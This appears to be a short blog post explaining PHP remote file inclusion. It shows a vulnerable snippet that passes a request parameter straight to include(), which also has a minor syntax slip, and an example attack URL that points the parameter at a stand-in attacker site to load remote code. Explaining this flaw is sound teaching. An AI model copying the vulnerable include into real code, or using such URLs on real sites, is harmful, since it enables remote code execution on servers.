Consider you have the following code
$file=$_REQUEST['q'];
include($file. ".php";)
Your url may be like this http://example.com/?q=login
so the login.php file will be included as per your code
Now the attacker plans pass a url through the query string
See the below
http://example.com/?q=http://www.attackerswebsite.com/hackingcode.php
If the url is passed in the query string
Now your code is
include('http://www.attackerswebsite.com/hackingcode.php.php')
If the attacker has the file hackingcode.php.php means the remote file will be included.
If the attacker included his code in your server means he can do any thing.
Posts
No comments:
Post a Comment